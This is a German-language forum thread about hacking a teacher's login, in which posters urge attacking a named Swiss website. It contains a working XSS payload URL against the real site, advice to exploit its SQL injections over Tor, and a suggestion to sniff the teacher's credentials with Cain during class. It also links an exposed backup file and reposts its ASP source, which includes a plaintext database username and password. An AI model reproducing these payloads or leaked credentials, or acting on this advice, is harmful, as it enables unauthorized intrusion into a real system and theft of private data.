Lehrer login hacken

[Apologist]

Proxy?

Wenn du no-ip benutzt, dann wird da wohl keiner bei den Admins "anrufen" ^^ und sagen:" Öhm .... da war einer auf unserem Schulserver ... könnten Sie uns die richtige IP vom User der Domain ... geben?"

Da niemand wirklich zu Schaden gekommen ist, wird no-ip den nen Vogel zeigen xD

und btw. das mit dem Server im Schulnetzwerk ist ja nicht wirklich schwer ....

Wie man es am einfachsten macht, verrat ich dir nicht ... musste selbst drauf kommen -.-'

[p4r4n0id]

wie sieht das mit den benutzeraccs aus? habt ihr nicht für jeden schüler nen eigenen login namen? bei uns schon...da könnte man das schön nachvollziehen wer wo wie was installiert hat...
und unterschätz die schulen nich...wenns darum geht, dass möglicherweise sensibles material "gestohlen" sien könnte dann machen die auch bisschen mehr wirbel denke ich mal!

[Nemo.A]

Auf der Seite sind sehr einfach ausnutzbare SQL-Injections. Les dir am besten ein paar SQL-Injection Tutorials durch, mach Tor an, und los geht die Party!

PS: Wieso konnte nie irgendeine meiner damaligen Schulseiten so vulnerable sein? :cry:

[Siken]

Auch 2 XSS Lücken lassen sich finden =/

//
Warum benutzt meine Schul-Hompage nur HTML + htaccess -.-

[l1pkIcK]

Proxy?

Wenn du no-ip benutzt, dann wird da wohl keiner bei den Admins "anrufen" ^^ und sagen:" Öhm .... da war einer auf unserem Schulserver ... könnten Sie uns die richtige IP vom User der Domain ... geben?"

Da niemand wirklich zu Schaden gekommen ist, wird no-ip den nen Vogel zeigen xD

und btw. das mit dem Server im Schulnetzwerk ist ja nicht wirklich schwer ....

Wie man es am einfachsten macht, verrat ich dir nicht ... musste selbst drauf kommen -.-'

Warum sollen die bei NoIp anrufen sollen? NOIP ist einfach eine 1:1 weiterleitung an deine IP, also mit Netstat -a und dann die DNS anpingen ist es kein Problem deine richtige IP zu sehen.

NoIp hat nichts mit anonymität zum tun.

[donkrawalo]

Am besten mit Cain während dem Unterricht mitsniffen und wenn du Glück hast loggt er sich ein oder er loggt sich in seine E-Mail ein.

[YannicK]

http://www.lena-lefi.ch/asplpswdchng.asp?mldg=<script>alert("XSS+by+Yannic K");</script>&username="><script>alert("XSS+by+YannicK") ;</script>


XSS found by me :p

Achja wo soll man da ne sql-injection finden o_O

[Roflkid]

Sry wenn der Thread schon zu alt ist.

Hab auf dem Server noch ein Backupfile gefunden könnte interessant sein

http://www.lena-lefi.ch/lefilu/index.bak

[AASF]

Code:

<%   
Set Conn = Server.CreateObject("ADODB.Connection")  
ConnectionString = "dsn=WEBServerLENALUP;uid=Lenaluuser;pwd=lenaluuser" 
Conn.Open(ConnectionString)

SQL = "SELECT Distinct Berufsbezeichnung=rtrim(lenalup.dbo.Berufe.Berufsbezeichnung), Beruf_Weiblich, "
SQL = SQL + "Berufsunterbezeichnung=rtrim(lenalup.dbo.Berufe.Berufsunterbezeichnung), Akt_Datum, "
SQL = SQL + "Anlehre = CASE WHEN Prüf_Nr <> 900 THEN 0 ELSE Prüf_Nr END "
SQL = SQL + "FROM lenalup.dbo.Lehrstellen INNER JOIN lenalup.dbo.Berufe "
SQL = SQL +	"ON lenalup.dbo.Lehrstellen.Berufs_Nr = lenalup.dbo.Berufe.Berufs_Nr "
SQL = SQL + "Order By lenalup.dbo.Berufe.Berufsbezeichnung"
Set RSBerufe = Conn.Execute(SQL)   

SQL = "SELECT Berufsgruppen_Nr, Berufsgruppenbezeichnung FROM Berufsgruppen Order By Berufsgruppenbezeichnung"
Set RSBerufsgruppen = Conn.Execute(SQL)

SQL = "Select Distinct ST_Ort=rtrim(St_Ort) FROM lehrstellen ORDER BY st_ort"
Set RSOrt = Conn.Execute(SQL)
%>

Das sind die spannenden Stellen.

[heatshock]

Geiler Login oder?
http://www.lena-lefi.ch/lefilu/login...t=%22800%22%3E